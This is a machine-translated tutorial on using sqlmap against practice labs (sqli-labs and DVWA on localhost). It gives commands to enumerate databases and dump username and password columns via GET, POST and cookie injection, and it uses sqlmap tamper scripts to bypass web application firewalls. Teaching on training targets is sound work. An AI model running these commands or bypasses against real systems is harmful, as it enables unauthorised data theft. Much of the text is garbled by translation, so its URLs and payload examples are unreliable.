sqlmap basic use
Get a url:
HTTP: // localhost / sqli-Labs-Master / Less-1 / the above mentioned id = 1?
To determine whether there is injected
python sqlmap.py -u "http: // localhost / sqli-labs-master / Less-1 ? / 1 the above mentioned id = "
GET type implanted
View all databases: python sqlmap.py -u" http: // localhost / sqli-labs-master / Less-1 / id = 1 "--dbs?
View database currently in use: python sqlmap.py -u "http:? // localhost / sqli-labs-master / Less-1 / id = 1" --current-db
view the current user: python sqlmap.py -u "http: // localhost / ? sqli-labs-master / Less -1 / id = 1 "--current-user
to view the data sheet: python sqlmap.py -u" http: // localhost / sqli-labs-master / Less-1 / id =? 1 "-D security --tables
see the field name: python sqlmap.py -u" http: // localhost / sqli-labs-master / Less-1 / id = 1 "-D security -T users --columns?
查看数据:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security -T users -C username,password --dump
post injection
Designated post data: python sqlmap.py -u "http: // localhost / DVWA-master / vulnerabilities / sqli /" --data "post data"
remaining arguments with GET
Cookie injection
specify cookiepython sqlmap.py -u "http: / / localhost / DVWA-master / vulnerabilities / sqli / id = 1 & Submit = Submit "--cookie" ... cookie value "?
remaining arguments get the same
if not scan cookie parameters can try to improve rating: -Level 1-5
POST and cookie examples:
statement
python sqlmap.py -u "? http: // localhost / DVWA-master / vulnerabilities / sqli / id = 1 & Submit = Submit" --data "id = 1 & Submit = Submit" --cookie "security = medium; Phpstorm-59ffdf3e = b96b8d81-1a28-4172-9cfd-0c102f180bc5; PHPSESSID = od9ogfo1ej1f0auccbp96edt02 "--current-db
effect
Use sqlmap into the bypass mechanism waf
Introduction
sqlmap in tamper brought us a lot of anti-filtering script, very practical, through the built-in tamper, tamper or write their own (path: the installation directory sqlmap \ tamper), we can help automate attacks to bypass waf
use
specified script :
- Tamper "script name" ( "apostrophemask")
Example: python sqlmap.py -u "http: // localhost / sqli-labs-master / Less-1 / id = 1?" --tamper " script name"
common script:
apostrophemask.py:
with utf8 place quotes -> ( "the AND. 1 '. 1' = '. 1")'. 1 the AND% EF 871% EF%%% the BC the BC% 87% EF% = 871% the BC '
Base64Encode. py:
replace with base64 encoding -> ( "1 'the AND SLEEP (5) #")' MScgQU5EIFNMRUVQKDUpIw == '
multiplespaces.py:
add more spaces around SQL keyword -> (' 1 UNION SELECT foobar ')' 1 UNION foobar the SELECT '
space2plus.py:
using replace spaces + -> (' the FROM the SELECT ID Users') '+ the SELECT + ID + the FROM Users'
nonrecursivereplacement.py:
Double query, keyword substituted with predefined SQL represents suitable for alternative (e.g. .replace ( "the SELECT", "")) Filters -> ( 'the UNION the SELECT. 1 2 -') '. 1 UNIOUNIONN SELESELECTCT 2-'
space2randomblank.py:
Instead of a space character ( "") optional active set from a random character whitespace -> ( 'the fROM the SELECT ID Users') 'the SELECT 0DFROM%%% 0Did 0Ausers'
unionalltounion.py:
Alternatively UNION ALL SELECT UNION SELECT-> ( 'the UNION ALL the SELECT -1') '-. 1 the UNION the SELECT'
securesphere.py:
adding a special string -> ( '1 aND 1 = 1') "1 aND 1 = 1 and '0having' = '0having'"
Example:
statement:
Python sqlmap.py -u "HTTP: //localhost/sqli-labs-master/Less-21/index.php" --cookie "uname = ADMIN" uname -p --tamper "Base64Encode" - level 5 --dbms mysql
effect is
to write your own script:
Example:
write a script 2or2and, and double or write and
execute
python sqlmap.py -u “http://localhost/sqli-labs-master/Less-25/?id=1” --tamper 2or2and --dbs
